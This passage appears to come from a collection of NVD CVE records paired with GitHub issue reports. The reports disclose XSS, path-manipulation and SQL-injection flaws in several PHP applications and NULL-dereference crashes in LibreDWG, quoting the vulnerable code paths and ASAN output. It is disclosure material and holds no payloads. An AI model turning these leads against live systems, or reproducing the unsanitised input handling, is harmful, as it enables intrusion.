"cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/yicenburan/manage/issues/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/yicenburan/manage/issues/2" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:manage_project:manage:-:*:*:*:*:*:*:*", "matchCriteriaId": "99420DDF-92CF-4FE7-BDF2-397272175F6E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/yicenburan/manage/issues/2
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "yicenburan", "manage" ]
Hello, I would like to report to XSS vulnerability. The path of the vulnerability. In file Application/Home/Controller/GoodsController.class.php, line 21 ```php public function postGoods(){ $postData = $_POST; $add=true; $this->upload($postData,$add); } ``` line 53 ```php public function upload($postData,$isAdd){ //... $add['title']=$postData['title']; $add['price']=$postData['price']; $add['img']=$info['picture']['savepath'].$info['picture']['savename']; if($isAdd){ $this->addGoods($add); } //... } } ``` line 77 ```php public function addGoods($addGoods){ // ... if($result >= 0){ $data=array( code=>'0', msg=>'添加成功', data=>$addGoods ); $this->ajaxReturn($data); } // ... } ``` In file ThinkPHP/Mode/Api/Controller.class.php line 55 ```php protected function ajaxReturn($data,$type='') { if(empty($type)) $type = C('DEFAULT_AJAX_RETURN'); switch (strtoupper($type)){ case 'JSON' : // 返回JSON数据格式到客户端 包含状态信息 header('Content-Type:application/json; charset=utf-8'); exit(json_encode($data)); case 'XML' : // 返回xml格式数据 header('Content-Type:text/xml; charset=utf-8'); exit(xml_encode($data)); case 'JSONP': // 返回JSON数据格式到客户端 包含状态信息 header('Content-Type:application/json; charset=utf-8'); $handler = isset($_GET[C('VAR_JSONP_HANDLER')]) ? $_GET[C('VAR_JSONP_HANDLER')] : C('DEFAULT_JSONP_HANDLER'); exit($handler.'('.json_encode($data).');'); case 'EVAL' : // 返回可执行的js脚本 header('Content-Type:text/html; charset=utf-8'); exit($data); } } ``` exit function will terminate the script and print a message to the user. Then there is XSS vulnerability because it contains values from $_POST.
Possible XSS vilnerability
https://api.github.com/repos/yicenburan/manage/issues/2/comments
2
2021-11-12T21:31:27Z
2023-04-30T18:07:57Z
https://github.com/yicenburan/manage/issues/2
1,052,422,165
2
2,818
CVE-2021-43685
2021-12-01T16:15:07.737
libretime hv3.0.0-alpha.10 is affected by a path manipulation vulnerability in /blob/master/legacy/application/modules/rest/controllers/ShowImageController.php through the rename function.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Broken Link", "Third Party Advisory" ], "url": "https://github.com/LibreTime/libretime/issues/1437" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link", "Third Party Advisory" ], "url": "https://github.com/LibreTime/libretime/issues/1437" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libretime:libretime_hv:3.0.0:alpha.10:*:*:*:*:*:*", "matchCriteriaId": "FD21AF31-9792-4048-B064-A46F993C8065", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "610" ]
610
https://github.com/LibreTime/libretime/issues/1437
[ "Broken Link", "Third Party Advisory" ]
github.com
[ "LibreTime", "libretime" ]
Hello, I would like to report for path manipulation vulnerability. The path of the vulnerability. In file https://github.com/LibreTime/libretime/blob/master/legacy/application/modules/rest/controllers/ShowImageController.php line 319 ```php private function getShowId() { if (!($id = $this->_getParam('id', false))) { //... } return $id; } ``` line 52 ```php public function postAction() { $showId = $this->getShowId(); //... try { $path = $this->processUploadedImage($showId, $_FILES['file']['tmp_name']); } catch (Exception $e) { // ... } } ``` line 163 ```php private function processUploadedImage($showId, $tempFilePath) { //... $importedStorageDirectory = $storDir->getDirectory() . 'imported/' . $ownerId . '/show-images/' . $showId; try { $importedStorageDirectory = $this->copyFileToStor($tempFilePath, $importedStorageDirectory, $fileExtension); } catch (Exception $e) { // ... } } ``` In file https://github.com/LibreTime/libretime/blob/master/legacy/application/common/OsPath.php line 56 ```php public static function join() { $args = func_get_args(); $paths = []; foreach ($args as $arg) { $paths = array_merge($paths, (array) $arg); } foreach ($paths as &$path) { $path = trim($path, DIRECTORY_SEPARATOR); } if (substr($args[0], 0, 1) == DIRECTORY_SEPARATOR) { $paths[0] = DIRECTORY_SEPARATOR . $paths[0]; } return implode(DIRECTORY_SEPARATOR, $paths); } ``` In file https://github.com/LibreTime/libretime/blob/master/legacy/application/modules/rest/controllers/ShowImageController.php line 256 ```php $image_stor = Application_Common_OsPath::join($importedStorageDirectory, $newFileName); ``` line 260 ```php // path manipulation in rename function if (@rename($image_file, $image_stor) === false) { //... } ```
Possible path manipulation vulnerability
https://api.github.com/repos/libretime/libretime/issues/1760/comments
13
2021-11-11T18:10:07Z
2022-04-12T14:21:32Z
https://github.com/libretime/libretime/issues/1760
1,201,923,181
1,760
2,819
CVE-2021-43681
2021-12-02T13:15:07.507
SakuraPanel v1.0.1.1 is affected by a Cross Site Scripting (XSS) vulnerability in /master/core/PostHandler.php. The exit function will terminate the script and print the message $data['proxy_name'].
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ZeroDream-CN/SakuraPanel/issues/23" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ZeroDream-CN/SakuraPanel/issues/23" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:zerodream:sakurapanel:1.0.1.1:*:*:*:*:*:*:*", "matchCriteriaId": "C3EB08B4-8A06-429C-86F4-41A2A70D51B0", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/ZeroDream-CN/SakuraPanel/issues/23
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "ZeroDream-CN", "SakuraPanel" ]
Hello, I would like to report for XSS vulnerability. In file https://github.com/ZeroDream-CN/SakuraPanel/blob/master/core/PostHandler.php line 87 ```php $result = $pm->checkRules($_POST); ``` In function checkRules ```php public function checkRules($data) { // .... if($this->isProxyNameExist($data['proxy_name'])) { return Array(false, "éš§é�“ {$data['proxy_name']} 已存在,请使用其他å��å­—"); } // .... } ``` line 96 ```php $msg = $result[1] ?? "未知错误"; exit($msg); ``` exit will terminate the script and print the message which have the value $data['proxy_name']. Then there is XSS vulnerability
Possible XSS vulnerability
https://api.github.com/repos/ZeroDream-CN/SakuraPanel/issues/23/comments
4
2021-11-11T16:17:30Z
2021-12-09T04:27:49Z
https://github.com/ZeroDream-CN/SakuraPanel/issues/23
1,051,143,872
23
2,820
CVE-2021-43683
2021-12-02T13:15:07.623
pictshare v1.5 is affected by a Cross Site Scripting (XSS) vulnerability in api/info.php. The exit function will terminate the script and print the message which has $_REQUEST['hash'].
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/HaschekSolutions/pictshare/issues/133" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/HaschekSolutions/pictshare/issues/133" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:haschek:pictshare:1.5:*:*:*:*:*:*:*", "matchCriteriaId": "8F6ED65A-5FD8-4824-844C-C2B7F1E87D5F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/HaschekSolutions/pictshare/issues/133
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "HaschekSolutions", "pictshare" ]
Hello, I would like to report for XSS vulnerability. in api/info.php function getInfoAboutHash ```php function getInfoAboutHash($hash) { // ... return array('hash'=>$hash,'size_bytes'=>$size,'size_interpreted'=>$size_hr,'type'=>$type,'type_interpreted'=>getTypeOfFile($file)); } ``` line 15 ```php $hash = $_REQUEST['hash']; // ... $answer = getInfoAboutHash($hash); $answer['status'] = 'ok'; exit(json_encode($answer)); // ... ``` exit function will terminate the script and print the message which has $_REQUEST['hash']. Then there is XSS vulnerability.
Possible XSS vulnerability
https://api.github.com/repos/HaschekSolutions/pictshare/issues/133/comments
7
2021-11-11T17:03:54Z
2021-12-10T08:42:40Z
https://github.com/HaschekSolutions/pictshare/issues/133
1,051,185,075
133
2,821
CVE-2021-43686
2021-12-02T13:15:07.667
nZEDb v0.4.20 is affected by a Cross Site Scripting (XSS) vulnerability in www/pages/api.php. The exit function will terminate the script and print the message which has the input $_GET['t'].
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/nZEDb/nZEDb/issues/2659" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/nZEDb/nZEDb/issues/2659" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:nzedb_project:nzedb:0.4.20:*:*:*:*:*:*:*", "matchCriteriaId": "642EED0E-97CA-4C26-BBA8-071F166A2B9F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/nZEDb/nZEDb/issues/2659
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "nZEDb", "nZEDb" ]
Hello, I would like to report for XSS vulnerability. The path of the vulnerability file www/pages/api.php line 49 ```php Misc::showApiError(202, 'No such function (' . $_GET['t'] . ')'); ``` file nzedb/utility/Misc.php in line 991 ```php public static function showApiError($status = 900, $message = ''): void { // ... $response = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n" . '<error code="' . $status . '" description="' . $message . "\"/>\n"; header('Content-type: text/xml'); header('Content-Length: ' . \strlen($response) ); header('X-nZEDb: API ERROR [' . $status . '] ' . $message); http_response_code($status); exit($response); } ``` exit function will terminate the script and print the message which has the input $_GET['t']. Then there is XSS vulnerability.
Possible XSS vulnerability
https://api.github.com/repos/nZEDb/nZEDb/issues/2659/comments
2
2021-11-12T15:10:52Z
2021-12-05T06:18:32Z
https://github.com/nZEDb/nZEDb/issues/2659
1,052,067,075
2,659
2,822
CVE-2021-43682
2021-12-02T14:15:08.047
thinkphp-bjyblog (last update Jun 4 2021) is affected by a Cross Site Scripting (XSS) vulnerability in AdminBaseController.class.php. The exit function terminates the script and prints a message to the user that contains $_SERVER['HTTP_HOST'].
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/baijunyao/thinkphp-bjyblog/issues/6" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/baijunyao/thinkphp-bjyblog/issues/6" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:thinkphp-bjyblog_project:thinkphp-bjyblog:-:*:*:*:*:*:*:*", "matchCriteriaId": "887A20DC-5B52-428B-A51B-32375BEB58AD", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/baijunyao/thinkphp-bjyblog/issues/6
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "baijunyao", "thinkphp-bjyblog" ]
Hello, I would like to report XSS vulnerability. In file AdminBaseController.class.php line 20 ```php redirect(U('Admin/Login/login')); ``` In file https://github.com/baijunyao/thinkphp-bjyblog/blob/master/ThinkPHP/Mode/Api/functions.php line 869 function U ```php $domain = $host.(strpos($host,'.')?'':strstr($_SERVER['HTTP_HOST'],'.')); ``` function U ```php // line 999 $url = (is_ssl()?'https://':'http://').$domain.$url; // line 1003 return $url; ``` function redirect ```php // line 694 $url = str_replace(array("\n", "\r"), '', $url); // line 707 $str = "<meta http-equiv='Refresh' content='{$time};URL={$url}'>"; // line 709 exit($str); ``` exit function will terminate the script and print the message to the user which has $_SERVER['HTTP_HOST']. Then there is XSS vulnerability.
Possible XSS vulnerability
https://api.github.com/repos/baijunyao/thinkphp-bjyblog/issues/6/comments
3
2021-11-11T16:39:45Z
2021-12-09T00:19:42Z
https://github.com/baijunyao/thinkphp-bjyblog/issues/6
1,051,164,245
6
2,823
CVE-2021-43679
2021-12-02T15:15:16.623
ecshop v2.7.3 is affected by a SQL injection vulnerability in shopex\ecshop\upload\api\client\api.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/shopex/ecshop/issues/4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/shopex/ecshop/issues/4" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:shopex:ecshop:2.7.3:*:*:*:*:*:*:*", "matchCriteriaId": "C8A07A91-6314-40DF-9918-2F99A766DE43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/shopex/ecshop/issues/4
[ "Exploit", "Third Party Advisory" ]
github.com
[ "shopex", "ecshop" ]
Hello, I would like to report for SQLI vulnerability. ## Vulnerability path File shopex\ecshop\upload\api\client\api.php ```php dispatch($_POST); ``` File shopex\ecshop\upload\api\client\includes\lib_api.php ```php function dispatch($post) { $func_arr = array('GetDomain', 'UserLogin', 'AddCategory', 'AddBrand', 'AddGoods', 'GetCategory', 'GetBrand', 'GetGoods', 'DeleteBrand', 'DeleteCategory', 'DeleteGoods', 'EditBrand', 'EditCategory', 'EditGoods'); if(in_array($post['Action'], $func_arr) && function_exists('API_'.$post['Action'])) { call_user_func('API_'.$post['Action'], $post); ``` File shopex\ecshop\upload\api\client\includes\lib_api.php ```php function API_UserLogin($post) { $post['username'] = isset($post['UserId']) ? trim($post['UserId']) : ''; $post['password'] = isset($post['Password']) ? strtolower(trim($post['Password'])) : ''; $sql = "SELECT user_id, user_name, password, action_list, last_login". " FROM " . $GLOBALS['ecs']->table('admin_user') . " WHERE user_name = '" . $post['username']. "'"; $row = $GLOBALS['db']->getRow($sql); ``` File shopex\ecshop\upload\includes\cls_mysql.php ```php function getRow($sql, $limited = false) { $res = $this->query($sql); ```
Possible SQL injection vulnerability
https://api.github.com/repos/shopex/ecshop/issues/4/comments
1
2021-11-11T15:27:51Z
2021-12-05T18:42:52Z
https://github.com/shopex/ecshop/issues/4
1,051,096,730
4
2,824
CVE-2021-28236
2021-12-02T22:15:08.893
LibreDWG v0.12.3 was discovered to contain a NULL pointer dereference via out_dxfb.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/324" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/324" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:0.12.3:*:*:*:*:*:*:*", "matchCriteriaId": "EDE60CD4-CABF-4AE6-B8D1-D93460C11445", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/LibreDWG/libredwg/issues/324
[ "Exploit", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
I found four NULL dereference bugs in the current master (5d2c75f). # Configure CFLAGS="-g -fsanitize=address" LDFLAGS="-fsanitize=address" ./configure # bug 1 in out_dxfb.c:1902 ## Command `./dwg2dxf -o ./fuzz_out -b -y ./poc1` ## ASAN report ``` ➜ ./dwg2dxf -o ./fuzz_out -b -y ./poc1 Reading DWG file ./poc1 Warning: checksum: 0x27c51243 (calculated) mismatch ERROR: Skip section AcDb:FileDepList with size 8 > 0 * 128 ERROR: obj_string_stream overflow, bitsize 96 => 96 ERROR: Invalid object handle 10.1.1 at pos @4.2 ERROR: bit_read_RC buffer overflow at 12 ERROR: bit_read_RC buffer overflow at 12 ERROR: bit_read_RC buffer overflow at 12 ERROR: bit_read_RC buffer overflow at 12 >= 12 ERROR: bit_read_BL: unexpected 2-bit code: '11' ERROR: bit_read_RC buffer overflow at 12 ERROR: Invalid CMC method 0x0 ignored ERROR: bit_advance_position buffer overflow at pos 11.7, size 12, advance by 2 ERROR: bit_read_BD buffer overflow at 12 >= 12 ERROR: Invalid BD identifier_height Warning: check_CRC mismatch 22-38 = 16: 401C <=> 0B9D Warning: Unstable Class object 502 TABLESTYLE (0xfff) 42/0 Warning: TODO TABLESTYLE r2010+ missing fields Warning: Unstable Class object 503 MATERIAL (0x481) 45/0 Warning: Unstable Class object 503 MATERIAL (0x481) 46/0 Warning: Unstable Class object 503 MATERIAL (0x481) 47/0 Warning: Ignore invalid handleoff (@390) ERROR: bit_read_RC buffer overflow at 174 ERROR: bit_read_RC buffer overflow at 171 ERROR: bit_read_RC buffer overflow at 973 ERROR: bit_read_RC buffer overflow at 284 ERROR: bit_read_RC buffer overflow at 284 ERROR: Some section size or address out of bounds ERROR: Failed to read uncompressed Preview section Warning: Skip empty section 0 AcDb:Template ERROR: Template section not found ERROR: Invalid num_segidx Warning: Object handle not found, 2/2 in 150 objects Warning: Object handle not found, 2/2 in 150 objects Warning: Object handle not found, 2/2 in 150 objects Writing DXF file ./fuzz_out as r14 ASAN:DEADLYSIGNAL ================================================================= ==17991==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000038 (pc 0x7ffff4cf2b1b bp 0x7fffffffc9c0 sp 0x7fffffff8450 T0) ==17991==The signal is caused by a READ memory access. ==17991==Hint: address points to the zero page. #0 0x7ffff4cf2b1a in dxfb_tables_write /home/yuan/afl-target/libredwg-asan/src/out_dxfb.c:1902 #1 0x7ffff4d06d16 in dwg_write_dxfb /home/yuan/afl-target/libredwg-asan/src/out_dxfb.c:2312 #2 0x5555555589a1 in main /home/yuan/afl-target/libredwg-asan/programs/dwg2dxf.c:336 #3 0x7ffff1e6bbf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) #4 0x555555556a89 in _start (/home/yuan/afl-target/libredwg-asan/programs/.libs/dwg2dxf+0x2a89) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/yuan/afl-target/libredwg-asan/src/out_dxfb.c:1902 in dxfb_tables_write ==17991==ABORTING ``` # bug 2 in out_dxfb.c:1924 ## Command `./dwg2dxf -o ./fuzz_out -b -y ./poc2` ## ASAN report ``` ➜ ./dwg2dxf -o ./fuzz_out -b -y ./poc2 Reading DWG file ./poc2 Warning: checksum: 0x27c51243 (calculated) mismatch ERROR: Skip section AcDb:FileDepList with size 8 > 0 * 128 ERROR: obj_string_stream overflow, bitsize 4294965675 => 88 ERROR: Invalid EED size 8770 > 11 ERROR: bit_read_RC buffer overflow at 11 ERROR: bit_read_RC buffer overflow at 11 ERROR: bit_read_RC buffer overflow at 11 ERROR: bit_read_RC buffer overflow at 11 ERROR: bit_read_RC buffer overflow at 11 ERROR: bit_read_RC buffer overflow at 11 ERROR: bit_read_RC buffer overflow at 11 ERROR: bit_read_RC buffer overflow at 11 ERROR: bit_read_RC buffer overflow at 11 ERROR: bit_read_RC buffer overflow at 11 ERROR: bit_read_RC buffer overflow at 11 ERROR: bit_read_RC buffer overflow at 11 ERROR: bit_read_RC buffer overflow at 11 ERROR: bit_read_RC buffer overflow at 11 ERROR: bit_advance_position buffer overflow at pos 10.7, size 11, advance by 2 ERROR: bit_read_BB buffer overflow at 11 >= 11 ERROR: bit_read_BD buffer overflow at 11 >= 11 ERROR: bit_read_B buffer overflow at 11 >= 11 ERROR: bit_read_BB buffer overflow at 11 >= 11 ERROR: bit_read_BD buffer overflow at 11 >= 11 ERROR: bit_read_RC buffer overflow at 11 >= 11 ERROR: bit_read_RD buffer overflow at 11 >= 11 ERROR: Invalid RD oblique_angle Warning: check_CRC mismatch 39-54 = 15: C16F <=> 0D90 Warning: Unstable Class object 502 TABLESTYLE (0xfff) 42/0 Warning: TODO TABLESTYLE r2010+ missing fields Warning: Unstable Class object 503 MATERIAL (0x481) 45/0 Warning: Unstable Class object 503 MATERIAL (0x481) 46/0 Warning: Unstable Class object 503 MATERIAL (0x481) 47/0 Warning: Ignore invalid handleoff (@390) ERROR: bit_read_RC buffer overflow at 174 ERROR: bit_read_RC buffer overflow at 171 ERROR: bit_read_RC buffer overflow at 973 ERROR: bit_read_RC buffer overflow at 284 ERROR: bit_read_RC buffer overflow at 284 ERROR: Some section size or address out of bounds ERROR: Failed to read uncompressed Preview section Warning: Skip empty section 0 AcDb:Template ERROR: Template section not found ERROR: Invalid num_segidx Warning: Object handle not found, 3/3 in 150 objects Warning: Object handle not found, 3/3 in 150 objects Warning: Object handle not found, 3/3 in 150 objects 